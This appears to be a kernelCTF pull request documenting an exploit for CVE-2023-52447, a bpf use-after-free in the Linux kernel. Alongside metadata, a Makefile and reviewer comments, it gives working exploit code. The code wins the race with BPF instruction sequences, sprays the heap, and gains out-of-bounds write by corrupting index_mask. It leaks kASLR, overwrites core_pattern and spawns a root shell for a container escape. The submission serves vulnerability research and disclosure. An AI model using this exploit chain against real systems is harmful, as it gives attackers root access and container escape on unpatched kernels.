Add kernelCTF CVE-2023-52447_cos #105
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,271 @@ | ||
# Exploit Tech Overview | ||
|
||
Starting from https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=bba1dc0b55ac, freeing a bpf map no longer needs to synchronize with RCU. | ||
Note that a bpf program runs under the RCU read lock, and looking up an arraymap from an array_of_maps does not increase its refcount. | ||
Such a bpf program therefore lets us obtain a reference to an arraymap without increasing its refcount. | ||
```c | ||
BPF_LD_MAP_FD(BPF_REG_9, array_of_map), | ||
BPF_MAP_GET_ADDR(0, BPF_REG_8), | ||
BPF_MOV64_REG(BPF_REG_9, BPF_REG_8), | ||
BPF_MAP_GET_ADDR(0, BPF_REG_8), // store an arraymap from array_of_map in BPF_REG_8 without increasing its refcount | ||
``` | ||
|
||
In summary, the vulnerability is that a bpf program can hold an arraymap pointer without increasing its refcount if the pointer comes from an array_of_maps. | ||
If the bpf program first stores an arraymap pointer in a register and then performs a time-consuming operation in the middle of the program, | ||
another thread gets a chance to free that arraymap and reclaim its memory as another structure, such as an array_of_maps. | ||
In our exploit, the arraymap and the array_of_maps are both allocated from the kmalloc-1024 cache. | ||
|
||
|
||
```C | ||
// store an arraymap from array_of_map in BPF_REG_8 without increasing its refcount | ||
BPF_LD_MAP_FD(BPF_REG_9, array_of_map), | ||
BPF_MAP_GET_ADDR(0, BPF_REG_8), | ||
BPF_MOV64_REG(BPF_REG_9, BPF_REG_8), | ||
BPF_MAP_GET_ADDR(0,BPF_REG_8), | ||
``` | ||
|
||
`bpf_ringbuf_output` is a bpf helper that uses memcpy to copy one buffer into another at line [1]. | ||
```C | ||
BPF_CALL_4(bpf_ringbuf_output, struct bpf_map *, map, void *, data, u64, size, | ||
u64, flags) | ||
{ | ||
struct bpf_ringbuf_map *rb_map; | ||
void *rec; | ||
|
||
if (unlikely(flags & ~(BPF_RB_NO_WAKEUP | BPF_RB_FORCE_WAKEUP))) | ||
return -EINVAL; | ||
|
||
rb_map = container_of(map, struct bpf_ringbuf_map, map); | ||
rec = __bpf_ringbuf_reserve(rb_map->rb, size); | ||
if (!rec) | ||
return -EAGAIN; | ||
|
||
memcpy(rec, data, size); //[1] | ||
bpf_ringbuf_commit(rec, flags, false /* discard */); | ||
return 0; | ||
} | ||
``` | ||
|
||
If the buffer is large, the copy takes some time to finish. | ||
That makes it a good way to extend the race window for the free and reclaim. | ||
|
||
```C | ||
// perform a time-consuming operation: use BPF_FUNC_ringbuf_output to copy a large buffer | ||
BPF_MOV64_REG(BPF_REG_1, BPF_REG_6), | ||
BPF_MOV64_REG(BPF_REG_2, BPF_REG_7), | ||
BPF_MOV64_IMM(BPF_REG_3, 0x10000000), | ||
BPF_MOV64_IMM(BPF_REG_4, 0x0), | ||
BPF_RAW_INSN(BPF_JMP | BPF_CALL, 0, 0, 0, BPF_FUNC_ringbuf_output) | ||
``` | ||
|
||
Once the thread on one core is busy inside the bpf program, | ||
we use threads on other cores to free and reclaim the arraymap. | ||
An mmapable bpf arraymap carries the signal from the bpf program that notifies us when we can start freeing. | ||
|
||
```c | ||
// Create a mmapable arraymap to signal we have stored target arraymap | ||
int signal = bpf_create_map_mmap(BPF_MAP_TYPE_ARRAY, 4, 8, 0x30, 0); | ||
// mmap arraymap region for userspace to know signal. | ||
signal_addr = mmap(NULL, 0x1000, PROT_READ | PROT_WRITE, MAP_SHARED, | ||
signal, 0); | ||
``` | ||
|
||
thread0 writes the value `1` into our signal arraymap: | ||
```c | ||
BPF_LD_MAP_FD(BPF_REG_9, signal), | ||
BPF_MAP_GET_ADDR(0, BPF_REG_7), | ||
BPF_ST_MEM( | ||
BPF_W, BPF_REG_7, 0, | ||
1), // write value one to signal that we have stored target arraymap | ||
|
||
``` | ||
|
||
thread1 busy-waits until signal_addr becomes `1`, then frees the target: | ||
```c | ||
while (signal_addr[0] == 0) | ||
; | ||
// Free target | ||
update_elem(array_of_map, 0, victim); | ||
``` | ||
|
||
thread2 busy-waits until signal_addr becomes `1`, then sprays to reclaim the freed memory as array_of_maps. | ||
max_entries is set to 0x30 so that the sprayed array_of_maps lands in kmalloc-1024, the same cache as the arraymap. | ||
|
||
```c | ||
while (signal_addr[0] == 0) | ||
; | ||
for (int i = 0; i < 0x100; i++) { | ||
spray_fd[i] = bpf_create_map(BPF_MAP_TYPE_ARRAY_OF_MAPS, 4, 4, | ||
0x30, samplemap); | ||
update_elem(spray_fd[i], 0, victim); | ||
} | ||
|
||
``` | ||
|
||
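The choice of 0x30 for max_entries can be checked with a little arithmetic. The following is a minimal sketch, assuming the `bpf_array` header occupies 0x110 bytes (the offset used elsewhere in this write-up), that both map types use 8-byte slots, and that the allocator uses the usual general-purpose kmalloc size classes. The helper names are hypothetical and not part of the exploit.

```c
#include <assert.h>
#include <stddef.h>

/* Assumption: header size taken from the 0x110 offset used in this write-up. */
#define BPF_ARRAY_HDR 0x110u

/* Smallest general-purpose kmalloc cache that fits `size`
 * (assumed size classes; the real list depends on the kernel config). */
static size_t kmalloc_bucket(size_t size)
{
    static const size_t classes[] = {8, 16, 32, 64, 96, 128, 192,
                                     256, 512, 1024, 2048, 4096, 8192};
    assert(size > 0);
    for (size_t i = 0; i < sizeof(classes) / sizeof(classes[0]); i++)
        if (size <= classes[i])
            return classes[i];
    return 0; /* larger requests are out of scope for this sketch */
}

/* Header plus one slot per entry. */
static size_t bpf_array_alloc_size(size_t elem_size, size_t max_entries)
{
    return BPF_ARRAY_HDR + elem_size * max_entries;
}
```

With 8-byte slots and 0x30 entries, the allocation is 0x110 + 0x30 * 8 = 0x290 bytes, which is larger than 512 and at most 1024, so under these assumptions both the arraymap and the array_of_maps are served from kmalloc-1024.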
|
||
The bpf program treats the map address stored in BPF_REG_8 as an arraymap, but it is now an array_of_maps. | ||
```C | ||
// The map BPF_REG_8 points to has been freed and reallocated as an array_of_maps | ||
BPF_LDX_MEM(BPF_DW, BPF_REG_0, BPF_REG_8,0), | ||
``` | ||
|
||
We can leak the arraymap address and array_map_ops through the malformed arraymap. | ||
Review comment: Could you add a note that based on array_map_ops you can find the kASLR base address? |
||
Once we know the kernel address of array_map_ops, we can find the kASLR base address: | ||
``` | ||
gef➤ p &array_map_ops | ||
$2 = (const struct bpf_map_ops *) 0xffffffff829c29e0 <array_map_ops> | ||
gef➤ p _stext | ||
$3 = {<text variable, no debug info>} 0xffffffff81000000 <startup_64> | ||
``` | ||
|
||
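The base address follows from the leak by subtracting a fixed offset. Below is a minimal sketch that uses the two addresses from the debugger session above; those constants are specific to that kernel build, and the function names are hypothetical.

```c
#include <assert.h>
#include <stdint.h>

/* Addresses from the gef session above, valid only for that kernel build. */
#define ARRAY_MAP_OPS_UNSLID 0xffffffff829c29e0ULL
#define STEXT_UNSLID         0xffffffff81000000ULL

/* Recover the randomized kernel text base from a leaked array_map_ops pointer. */
static uint64_t kaslr_base_from_ops(uint64_t leaked_array_map_ops)
{
    uint64_t offset = ARRAY_MAP_OPS_UNSLID - STEXT_UNSLID;
    assert(leaked_array_map_ops >= offset);
    return leaked_array_map_ops - offset;
}

/* Translate any non-randomized symbol address to its randomized address. */
static uint64_t rebase(uint64_t kaslr_base, uint64_t unslid_addr)
{
    return kaslr_base + (unslid_addr - STEXT_UNSLID);
}
```

The same `rebase` step would give the runtime address of any other symbol, such as core_pattern, once its address in the non-randomized image is known.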
```C | ||
BPF_LDX_MEM(BPF_DW, BPF_REG_0, BPF_REG_8, 0), // the map BPF_REG_8 points to has been freed and reallocated as an array_of_maps | ||
BPF_STX_MEM(BPF_DW, BPF_REG_9, BPF_REG_0, 0), // store the leaked arraymap address as a value in our own arraymap | ||
BPF_ALU64_IMM(BPF_ADD, BPF_REG_0, -0x110), // adjust the address so that the value overlaps bpf_array.map | ||
BPF_STX_MEM(BPF_W, BPF_REG_8, BPF_REG_0,0), // store our malformed arraymap pointer into the array_of_maps | ||
``` | ||
|
||
# Exploit Tech Detail | ||
|
||
After winning the race, the exploit proceeds as follows: | ||
|
||
* Modify the victim arraymap's max_entries and index_mask. | ||
* Use the victim arraymap to overwrite the index 0 arraymap pointer of a neighboring array_of_maps with (core_pattern - struct_bpf_array_offset). | ||
* Update the array_of_maps to modify core_pattern. | ||
* Achieve container escape. | ||
|
||
|
||
## Modify the victim arraymap's max_entries and index_mask. | ||
|
||
Because the value was adjusted to overlap bpf_array.map, we can create a bpf program that modifies map.max_entries and array->index_mask: | ||
|
||
```C | ||
BPF_LD_MAP_FD(BPF_REG_9, target), | ||
BPF_MAP_GET_ADDR(0, BPF_REG_9), | ||
BPF_MAP_GET_ADDR(4, BPF_REG_8), | ||
BPF_ST_MEM(BPF_W, BPF_REG_8, 4, 0x800), //modify map.max_entries | ||
// Review comment: The new value written to map.max_entries is 0x800. Can you explain why this specific value is chosen, for example "we need this much room for the out-of-bounds because of X"? |
||
|
||
BPF_MAP_GET_ADDR(0x20, BPF_REG_8), | ||
BPF_ST_MEM(BPF_W, BPF_REG_8, 4,0xffff), //modify array->index_mask | ||
// Review comment: The new value written to array->index_mask is 0xffff. Can you explain why it's useful for enabling out-of-bounds access? |
||
``` | ||
|
||
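We set map.max_entries to 0x800 so that accesses through the victim can reach into the next chunk in kmalloc-1024. | ||
We set array->index_mask to 0xffff to achieve out-of-bounds read/write in array_map_lookup_elem and array_map_update_elem, because both functions mask the index with index_mask before computing the element address. | ||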
```c | ||
static void *array_map_lookup_elem(struct bpf_map *map, void *key) | ||
{ | ||
... | ||
|
||
return array->value + (u64)array->elem_size * (index & array->index_mask); | ||
} | ||
|
||
|
||
static long array_map_update_elem(struct bpf_map *map, void *key, void *value, | ||
u64 map_flags) | ||
{ | ||
... | ||
val = array->value + | ||
(u64)array->elem_size * (index & array->index_mask); | ||
... | ||
} | ||
``` | ||
|
||
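The effect of the two overwritten fields can be modeled in plain C. This is a simplified sketch and not kernel code: it assumes that the elided part of the functions above rejects any index that is not below max_entries, and that the original index_mask is the next power of two above max_entries, minus one. All names are hypothetical.

```c
#include <assert.h>
#include <stdint.h>

/* Assumed derivation of the original mask: roundup_pow_of_two(max_entries) - 1. */
static uint32_t roundup_pow2(uint32_t n)
{
    uint32_t p = 1;
    assert(n > 0);
    while (p < n)
        p <<= 1;
    return p;
}

/* Byte offset from array->value, mirroring the expression in the kernel excerpt. */
static uint64_t elem_offset(uint32_t elem_size, uint32_t index, uint32_t index_mask)
{
    return (uint64_t)elem_size * (index & index_mask);
}

/* Model of a lookup: -1 if the (assumed) bounds check fails, else the offset. */
static int64_t model_lookup_offset(uint32_t max_entries, uint32_t index_mask,
                                   uint32_t elem_size, uint32_t index)
{
    if (index >= max_entries)
        return -1;
    return (int64_t)elem_offset(elem_size, index, index_mask);
}
```

For the victim created with 0x30 entries of 8 bytes, the model gives a mask of 0x3f, so index 0x80 is rejected, and even without the bounds check it would be masked back to offset 0. After the overwrite (max_entries 0x800, index_mask 0xffff), the same index yields offset 0x400, which lies in the next kmalloc-1024 chunk.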
|
||
Later, we use the bpf syscall to call array_map_lookup_elem/array_map_update_elem with larger indexes. | ||
|
||
## Use the victim arraymap to overwrite the index 0 arraymap pointer of a neighboring array_of_maps with (core_pattern - struct_bpf_array_offset). | ||
|
||
We use out-of-bounds access from the victim to modify the contents of the next chunk. | ||
To control what the next chunk contains, we use heap feng shui: we allocate some array_of_maps before and after the victim arraymap. | ||
```c | ||
// Allocate some array of maps before victim | ||
for (int i = 0; i < 0x10; i++) | ||
oob[i] = bpf_create_map(BPF_MAP_TYPE_ARRAY_OF_MAPS, 4, 4, 0x30, | ||
samplemap); | ||
victim = bpf_create_map(BPF_MAP_TYPE_ARRAY, 4, 8, 0x30, 0); | ||
|
||
// Allocate some array of maps after victim | ||
for (int i = 0; i < 0x10; i++) | ||
oob[i + 0x10] = bpf_create_map(BPF_MAP_TYPE_ARRAY_OF_MAPS, 4, 4, | ||
0x30, samplemap); | ||
|
||
``` | ||
The next chunk is then likely to be an array_of_maps, and we overwrite its index 0 arraymap pointer. | ||
```c | ||
// Store the address (core_pattern - struct_bpf_array_offset) we want to overwrite. | ||
update_elem(victim, (0x400 + 0x110 - 0x110) / 8, kaddr); | ||
``` | ||
|
||
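The index expression `(0x400 + 0x110 - 0x110) / 8` can be unpacked step by step. The sketch below assumes that the neighboring array_of_maps sits in the chunk directly after the victim, that chunks are 0x400 bytes apart, and that both maps place their first slot 0x110 bytes into the chunk, as the offsets in this write-up suggest. The function name is hypothetical.

```c
#include <assert.h>
#include <stdint.h>

#define CHUNK_SIZE   0x400u /* kmalloc-1024 object size */
#define VALUE_OFFSET 0x110u /* offset of the first slot, as used in this write-up */
#define ELEM_SIZE    8u     /* victim value size, also the size of a map pointer */

/* Victim index that aliases slot `slot` of the array_of_maps in the next chunk. */
static uint32_t oob_index_for_next_chunk_slot(uint32_t slot)
{
    /* Target offset measured from the start of the victim chunk. */
    uint32_t target = CHUNK_SIZE + VALUE_OFFSET + slot * ELEM_SIZE;
    /* Victim indexing starts at its own first slot, so subtract that offset. */
    uint32_t delta = target - VALUE_OFFSET;
    assert(delta % ELEM_SIZE == 0);
    return delta / ELEM_SIZE;
}
```

For slot 0 this evaluates to 0x80, which is within the enlarged max_entries of 0x800.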
## Update the array_of_maps to modify core_pattern. | ||
|
||
We create another bpf program that writes through the index 0 arraymap, which overwrites core_pattern. | ||
|
||
```C | ||
BPF_LD_MAP_FD(BPF_REG_9, target), | ||
BPF_MAP_GET_ADDR(0, BPF_REG_9), | ||
BPF_MAP_GET_ADDR(0, BPF_REG_8), // BPF_REG_8 will point to core_pattern | ||
BPF_MAP_GET_ADDR(1, BPF_REG_7), // BPF_REG_7 will point to core_pattern+8 | ||
BPF_MAP_GET_ADDR(2, BPF_REG_6), // BPF_REG_6 will point to core_pattern+16 | ||
|
||
BPF_LD_MAP_FD(BPF_REG_9, data), | ||
|
||
// Modify core_pattern to |/proc/%P/fd/666 %P | ||
BPF_MAP_GET(0, BPF_REG_4), | ||
BPF_STX_MEM(BPF_DW, BPF_REG_8, BPF_REG_4, 0), | ||
BPF_MAP_GET(1, BPF_REG_4), | ||
BPF_STX_MEM(BPF_DW, BPF_REG_7, BPF_REG_4, 0), | ||
BPF_MAP_GET(2, BPF_REG_4), | ||
BPF_STX_MEM(BPF_DW, BPF_REG_6, BPF_REG_4, 0), | ||
|
||
BPF_MOV64_IMM(BPF_REG_0, 0), | ||
BPF_EXIT_INSN() | ||
``` | ||
|
||
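The program above copies three 8-byte values from the `data` map into core_pattern. One way to prepare those values in userspace is sketched below; how the original exploit fills the `data` map is not shown in this write-up, so the helper is a hypothetical illustration.

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

#define CORE_PATTERN_STR "|/proc/%P/fd/666 %P"

/* Pack the NUL-terminated pattern into three 8-byte words, zero padded,
 * matching the three 8-byte stores at core_pattern, +8 and +16. */
static void pack_core_pattern(uint64_t words[3])
{
    char buf[24] = {0};
    /* 19 characters plus the terminator must fit in 24 bytes. */
    assert(sizeof(CORE_PATTERN_STR) <= sizeof(buf));
    memcpy(buf, CORE_PATTERN_STR, sizeof(CORE_PATTERN_STR));
    memcpy(words, buf, sizeof(buf));
}
```

Each word would then be stored as the value at index 0, 1, and 2 of the `data` map. Because the buffer is zero padded, the string stays NUL-terminated after the third store.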
## Achieve container escape. | ||
|
||
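After core_pattern has been overwritten with `|/proc/%P/fd/666 %P`, a crashing process makes the kernel run whatever file is open at fd 666 of that process. | ||
|
||
We therefore create a memfd, write an executable payload into it, and duplicate it to fd 666. | ||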
```C | ||
int check_core() | ||
{ | ||
// Check if /proc/sys/kernel/core_pattern has been overwritten | ||
char buf[0x100] = {}; | ||
int core = open("/proc/sys/kernel/core_pattern", O_RDONLY); | ||
read(core, buf, sizeof(buf)); | ||
close(core); | ||
return strncmp(buf, "|/proc/%P/fd/666", 0x10) == 0; | ||
} | ||
void crash(char *cmd) | ||
{ | ||
int memfd = memfd_create("", 0); | ||
SYSCHK(sendfile(memfd, open("/proc/self/exe", 0), 0, 0xffffffff)); | ||
dup2(memfd, 666); | ||
close(memfd); | ||
while (check_core() == 0) | ||
sleep(1); | ||
puts("Root shell !!"); | ||
/* Trigger a crash so that the kernel executes the program named by core_pattern, which is our "root" binary */ | ||
*(size_t *)0 = 0; | ||
} | ||
``` | ||
|
||
Later, when the coredump happens, the kernel executes our file as root in the root namespace: | ||
```C | ||
*(size_t*)0=0; //trigger coredump | ||
``` | ||
|
||
The code that runs as root looks like this: | ||
```c++ | ||
// This section of code will be executed by root! | ||
int pid = strtoull(argv[1], 0, 10); | ||
int pfd = syscall(SYS_pidfd_open, pid, 0); | ||
int stdinfd = syscall(SYS_pidfd_getfd, pfd, 0, 0); | ||
int stdoutfd = syscall(SYS_pidfd_getfd, pfd, 1, 0); | ||
int stderrfd = syscall(SYS_pidfd_getfd, pfd, 2, 0); | ||
dup2(stdinfd, 0); | ||
dup2(stdoutfd, 1); | ||
dup2(stderrfd, 2); | ||
/* Print the flag first, then spawn a root shell */ | ||
system("cat /flag"); | ||
execlp("bash", "bash", NULL); | ||
``` |
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,12 @@ | ||
- Requirements: | ||
- Capabilities: NA | ||
- Kernel configuration: CONFIG_BPF_SYSCALL=y | ||
- User namespaces required: No | ||
- Introduced by: https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit?id=bba1dc0b55ac462d24ed1228ad49800c238cd6d7 | ||
- Fixed by: https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=876673364161da50eed6b472d746ef88242b2368 | ||
- Affected Version: v5.8 - v6.6 | ||
- Affected Component: bpf | ||
- Syscall to disable: bpf | ||
- URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-52447 | ||
- Cause: Use-After-Free | ||
- Description: A use-after-free vulnerability in the Linux kernel's bpf. Release the reference of the old element in the map during map update or map deletion. The release must be deferred, otherwise the bpf program may incur use-after-free problems. We recommend upgrading past commit 876673364161da50eed6b472d746ef88242b2368. |
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,7 @@ | ||
all: exploit | ||
|
||
exploit: exploit.c | ||
	gcc -o exploit exploit.c -static -pthread | ||
|
||
clean: | ||
	rm -rf exploit |
Review comment: Can you explain why the value 0x30 is chosen here?